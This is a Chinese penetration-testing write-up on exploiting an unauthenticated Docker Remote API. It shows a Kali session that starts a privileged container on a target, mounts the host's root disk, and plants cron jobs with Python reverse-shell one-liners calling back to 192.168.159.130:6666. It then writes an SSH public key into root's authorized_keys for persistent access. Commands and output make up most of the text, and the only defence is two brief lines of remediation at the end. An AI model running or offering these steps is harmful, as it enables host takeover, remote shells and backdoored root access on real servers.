0x00 漏洞简介
docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API,方便docker集群管理和扩展。
0x01 正文
验证漏洞存在
直接输入地址 http://your-ip:2375/version(端口会因为配置问题稍有出入) 若能访问,证明存在未授权访问漏洞。
测试可达性
┌──(kali㉿kali)-[~/Desktop]
└─$ ping 192.168.249.202
PING 192.168.249.202 (192.168.249.202) 56(84) bytes of data.
64 bytes from 192.168.249.202: icmp_seq=1 ttl=128 time=1.97 ms
64 bytes from 192.168.249.202: icmp_seq=2 ttl=128 time=2.26 ms
^C
--- 192.168.249.202 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 1.971/2.116/2.261/0.145 ms
┌──(kali㉿kali)-[~/Desktop]
└─$ docker -H tcp://192.168.249.202:5555 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAME
常见dockers管理命令
docker -H tcp:
docker -H tcp:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# docker -H tcp://192.168.249.202:5555 pull alpine
Using default tag: latest
latest: Pulling from library/alpine
Digest: sha256:bc41182d7ef5ffc53a40b044e725193bc10142a1243f395ee852a8d9730fc2ad
Status: Image is up to date for alpine:latest
docker.io/library/alpine:latest
┌──(root㉿kali)-[/home/kali/Desktop]
└─# docker -H tcp://192.168.249.202:5555 run -it --privileged alpine bin/sh
/ # ls
bin etc lib mnt proc run srv tmp var
dev home media opt root sbin sys usr
/ # ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:656 (656.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
挂载硬盘sda2
/ # fdisk -l
Disk /dev/sda: 894 GB, 960197124096 bytes, 1875385008 sectors
116737 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Device Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type
/dev/sda1 0,32,33 522,75,1 2048 8390655 8388608 4096M 82 Linux swap
/dev/sda2 * 522,75,2 1023,254,63 8390656 1875378175 1866987520 890G 83 Linux
Disk /dev/sdb: 894 GB, 960197124096 bytes, 1875385008 sectors
116737 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdb doesn't contain a valid partition table
Disk /dev/sdf: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdf doesn't contain a valid partition table
Disk /dev/sdd: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdd doesn't contain a valid partition table
Disk /dev/sdc: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sdc doesn't contain a valid partition table
Disk /dev/sde: 1863 GB, 2000398934016 bytes, 3907029168 sectors
243201 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/sde doesn't contain a valid partition table
Disk /dev/dm-0: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-0 doesn't contain a valid partition table
Disk /dev/dm-1: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-1 doesn't contain a valid partition table
Disk /dev/dm-2: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-2 doesn't contain a valid partition table
Disk /dev/dm-3: 894 GB, 960181043200 bytes, 1875353600 sectors
116735 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-3 doesn't contain a valid partition table
Disk /dev/dm-4: 1863 GB, 2000381018112 bytes, 3906994176 sectors
243199 cylinders, 255 heads, 63 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-4 doesn't contain a valid partition table
/ # mkdir test
/ # ls
bin etc lib mnt proc run srv test usr
dev home media opt root sbin sys tmp var
/ # mount /dev/sda2 test
/ # cd test
/test # whoami
root
/test # touch just.txt
/test # ls
bin home lib64 log-2022-04 log-2022-08 proc srv var
boot iDiscovery log-2021-09 log-2022-05 media root sys
dev just.txt log-2021-11 log-2022-06 mnt run tmp
etc lib log-2021-12 log-2022-07 opt sbin usr
//至此sda2挂载到test下
尝试反弹shell
(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -
echo "*/1 * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" >> /test/etc/crontab
经过以上尝试发现均反弹不会来,冥思苦想最后发现是被攻击机不出内网。。。。
更换vps进行尝试
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsYNh4bLNmhQ7Cu64zYsIrxYWyEGz2dbd2B4s+SeX0h7c2p1UboZ1IUB60D3R05pExRcIxbX+P7k3PSeCnHHJG6JSqiahPxR7+J+sCvVr4Ki6inP87P8kpIRmXR2iTnIm5+Q/1cuxGgdF9ut6mBfUA4G8HV0AGhdsyaO6HdeS5iVYyc3tNfKDaZPqXi0UA6RPXDfhO9AfxUYn+sbHkJqTP9sI/4yRr+lN9UquyCGc03my16wThgSUp5aXxJqkpOuzSjHxBcsHWKFB/FfQVIGqDJuqU01V13NuL23ag8aDL root@" > /root/.ssh/authorized_keys
ssh root@IP -i id_rsa
0x02 修复建议
设置ACL,只允许信任的IP端口连接对应端口
开启TLS,使用生成的证书进行认证